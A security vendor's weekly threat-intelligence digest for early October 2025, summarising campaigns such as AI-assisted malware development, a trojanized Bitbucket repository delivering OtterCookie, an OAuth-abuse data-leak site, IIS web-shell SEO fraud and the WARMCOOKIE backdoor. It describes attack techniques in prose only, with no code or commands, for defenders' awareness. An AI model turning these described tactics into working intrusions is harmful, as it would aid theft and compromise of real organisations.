< Back
dark blue background and colored padloks

Tags:

Threat intelligence
10 October 2025

Weekly Summary Cyberattacks October 02-08

OpenAI Disrupts Multiple Clusters Misusing ChatGPT to Accelerate Cybercrime and Influence Operations   

OpenAI published its latest threat intelligence report, revealing that multiple state-linked and criminal actors have utilized ChatGPT to enhance their cyber operations, scams, and influence campaigns. Since 2024, OpenAI has disrupted over forty networks by violating their usage policies, finding that adversaries increasingly integrate AI into existing workflows to streamline phishing, malware development, and propaganda, rather than to create new attack methods. The first involved Russian-language criminal operators who utilized ChatGPT to aid in the development of remote-access trojans and credential-stealing modules. These accounts, active on Telegram and affiliated with Russian-speaking underground forums, utilized the model to troubleshoot and refine components for post-exploitation, shellcode conversion, and browser credential parsing. The actors leveraged multiple ChatGPT accounts to generate and debug building-block code for in-memory loaders, clipboard hijacking, and Telegram-based exfiltration, treating the model as a technical assistant rather than a malware generator. OpenAI emphasized that its models consistently refused explicitly malicious requests and that no new offensive capabilities emerged beyond what is already publicly available. 

Malicious Node Package Deploys OtterCookie   

A new campaign was detected in which a trojanized open-source project hosted on Bitbucket delivered OtterCookie, a North Korea–linked stealer/backdoor family, to developer workstations and financial-sector targets. The malicious repository posed as a benign 3D chess project but contained an initialization routine deliberately engineered to fail; when that failure path executed, a catch block reached out to a remote API and downloaded attacker-supplied JavaScript, which was compiled and executed in-process. That remote-stage design allowed a mostly benign repository to act as a stealthy staging channel: the visible code remained normal while the remote response performed malicious actions. 

ShinyHunters Launches Data Leak Site: Trinity of Chaos Announces New Ransomware Victims   

A new data leak site called "Trinity of Chaos" has been launched by a cybercrime collective associated with ShinyHunters, LAPSUS$, and Scattered Spider. This site lists 39 organizations as victims. The adversaries are reported to have exploited weak configurations and misused authorization flows (OAuth) and its integrations, possibly leveraging voice phishing to trick employees into granting malicious OAuth apps access to critical CRM infrastructure. Once they secured access, attackers exported large volumes of personally identifiable information (PII) and sensitive data. The fusion of data exfiltration plus the threat of encryption or further public exposure underscores that these attacks are now a hybrid of data breach and ransomware models. 

UAT-8099: Chinese-Speaking Cybercrime Group Targets High-Value IIS for SEO Fraud   

A Chinese-speaking cybercrime group, designated UAT 8099, has been identified as the operator behind a sophisticated campaign targeting high-value IIS web servers across multiple countries. The group's primary objectives are SEO fraud and credential theft, and its victims include universities, telecom providers, and technology companies in regions such as India, Thailand, Vietnam, Canada, and Brazil. UAT 8099 gains initial access by exploiting insecure file upload configurations on IIS servers to deploy web shells. Once inside, they activate and escalate the privileges of guest accounts to gain administrator access, enabling Remote Desktop Protocol (RDP) connections. By compromising trusted server infrastructure, UAT-8099 undermines search engine integrity, exposing both users and organizations to ongoing risk.  

WARMCOOKIE One Year Later: New Features and Fresh Insights 

Updated findings on WARMCOOKIE, a Windows backdoor observed in enterprise-targeted intrusions. The report tracks how the backdoor has continued to evolve over the past year: operators maintain active infrastructure and have iterated on code protections, while the core purpose remains unchanged —establishing a quiet foothold on endpoints and then gaining hands-on control for post-compromise activity. WARMCOOKIE's execution chain leads to a resident backdoor that communicates with its command-and-control over HTTP(S), exchanging encrypted tasking and results. Once active, it supports typical backdoor functionality commonly used during early stages of intrusions, including host reconnaissance and fingerprinting, remote command execution, file operations (read/write/upload), and surveillance features such as screen capture. Samples are characterized by strong obfuscation and anti-analysis measures designed to frustrate static inspection and sandboxing, as well as by runtime behaviors that minimize artifacts on disk to complicate forensics.